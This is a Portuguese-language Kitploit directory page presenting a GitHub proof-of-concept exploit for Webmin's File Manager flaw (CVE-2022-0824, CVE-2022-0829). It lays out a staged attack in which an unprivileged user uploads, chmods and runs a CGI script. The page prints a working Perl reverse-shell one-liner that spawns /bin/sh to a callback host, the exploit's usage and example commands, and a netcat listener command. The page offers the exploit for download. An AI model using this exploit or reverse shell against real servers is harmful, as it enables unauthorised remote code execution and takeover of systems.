Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WebminRCE-exploit — CVE-2022-0824, CVE-2022-0829, exploração de privilégio do Gerenciador de Arquivos | Kitploit
Ferramentas/GitHubGitHub/gokul-ramesh/webminrce-exploit
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubgokul-ramesh/webminrce-exploit

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829, exploração de privilégio do Gerenciador de Arquivos

Ver Repositório
2há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829 - exploit de privilégio do File Manager

A aplicação vulnerável para testar este PoC pode ser encontrada aqui como uma imagem docker.
Pré-requisitos:

  • Python3
  • Módulo Requests

Descrição

Vulnerabilidade

Controle de Acesso Incorreto para Execução Remota de Código Usuários seguros (usuário não privilegiado) podem acessar o módulo File Manager, que deveria ser restrito por padrão.

Payload do Exploit

Use a vulnerabilidade de Controle de Acesso Incorreto para enviar um arquivo cgi para o servidor webmin.

Estágio 1 (Autenticação)

Autentique e faça login no servidor com um usuário seguro/menos privilegiado.

Estágio 2 (Baixar arquivo no servidor)

Utilize o módulo vulnerável File Manager (/file-manager/http_download.cgi) para baixar um script perl no servidor.
Script Perl para obter um acesso reverse shell :
root@kitploit:~
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Estágio 3 (Modificar permissão)

Adicione permissão de execução ao arquivo (/file-manager/chmod.cgi)

Estágio 4 (Executar comando)

Simplesmente chame o arquivo enviado para executar o script reverse shell presente dentro do mesmo.

Instruções de uso:

root@kitploit:~
  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

Exemplo de uso:

root@kitploit:~
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
root@kitploit:~
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

Nome de usuário e senha são para usuários seguros (não privilegiados) Configure um listener antes de executar o script para obter uma conexão reverse shell.

root@kitploit:~
$ nc -lvp <port>

Agradecimentos a @faisalfs10x pelo exploit.

Baixar ferramenta